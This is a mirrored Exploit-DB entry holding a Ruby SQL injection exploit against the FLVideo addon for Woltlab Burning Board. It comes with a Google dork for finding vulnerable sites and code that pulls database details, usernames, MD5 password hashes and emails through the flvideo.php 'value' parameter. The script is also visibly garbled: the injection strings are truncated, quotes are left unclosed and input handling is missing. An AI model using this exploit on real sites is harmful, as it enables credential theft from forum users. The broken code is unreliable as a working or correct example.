Woltlab Burning Board FLVideo Addon – ‘video.php?value’ SQL Injection

  • 作者: Easy Laster
    日期: 2013-09-06
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/28126/
  • # Exploit Title: Woltlab Burning Board FLVideo Addon SQL Injection flvideo.php Exploit
    # Google Dork: inurl:flvideo.php wbb (and more)
    # Date: 04.09.2013
    # Exploit Author: Easy Laster
    # Vendor Homepage: http://www.flvideo.de/
    # Version: FLVideo Addon for WBB © 2007 by Danny König 
    # Tested on: Windows8/Backtrack
    #Discovered and Vulnerability by Easy Laster
    print "
    #Woltlab Burning Board FLVideo Addon SQL Injection flvideo.php #
    #Exploit #
    # Using Host+Path+id #
    #www.demo.de + /wbb/ + or + / + 1#
    # Easy Laster#
    require 'net/http'
    block = "################################################################"
    print ""+ block +""
    print "\nEnter Target Name (site.com)->"
    print ""+ block +""
    print "\nEnter Script Path (/wbb/ or /)->"
    print ""+ block +""
    print "\nEnter The ID From User (id)->"
    print ""+ block +""
    dir ="flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+
     "**/+userid="+ userid +"--+"
     http = Net::HTTP.new(host, 80)
     resp= http.get(path+dir)
     print "\nVersion Database -> "+(/'~'(.+)'~'/).match(resp.body)[1]
    dir ="flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+
    "**/+userid="+ userid +"--+"
    http = Net::HTTP.new(host, 80)
    resp= http.get(path+dir)
    print "\nDatabase User-> "+(/'~'(.+)'~'/).match(resp.body)[1]
     dir ="flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+
     "**/+userid="+ userid +"--+"
     http = Net::HTTP.new(host, 80)
     resp= http.get(path+dir)
     print "\nID Account-> "+(/'~'(.+)'~'/).match(resp.body)[1]
     dir ="flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+
     "**/+userid="+ userid +"--+"
     http = Net::HTTP.new(host, 80)
     resp= http.get(path+dir)
     print "\nUsername Account -> "+(/'~'(.+)'~'/).match(resp.body)[1]
    dir ="flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+
    "**/+userid="+ userid +"--+"
    http = Net::HTTP.new(host, 80)
    resp= http.get(path+dir)
    print "\nPassword Account MD5 -> "+(/'~'(.+)'~'/).match(resp.body)[1]
     dir ="flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+
     "**/+userid="+ userid +"--+"
     http = Net::HTTP.new(host, 80)
     resp= http.get(path+dir)
     print "\nEmail Adresse Account -> "+(/'~'(.+)'~'/).match(resp.body)[1]
    print "\n" 
    print ""+ block +""
     print "\n"
     print "
    #Greetings #
    #mAdDiN, c0Re, illuministrator, WD40, peak, IRET, GabbaGandalf #
    #DR.zydz, HANN!BAL, 6rbk9 , Manifest, doc, cr4ck, Prof.Dr. Ogen#
    #ezah, enco, 4c!d And SecuNet.cc, 4004, dc3 crew, hackbase.cc#
    print "\nExploit Failed"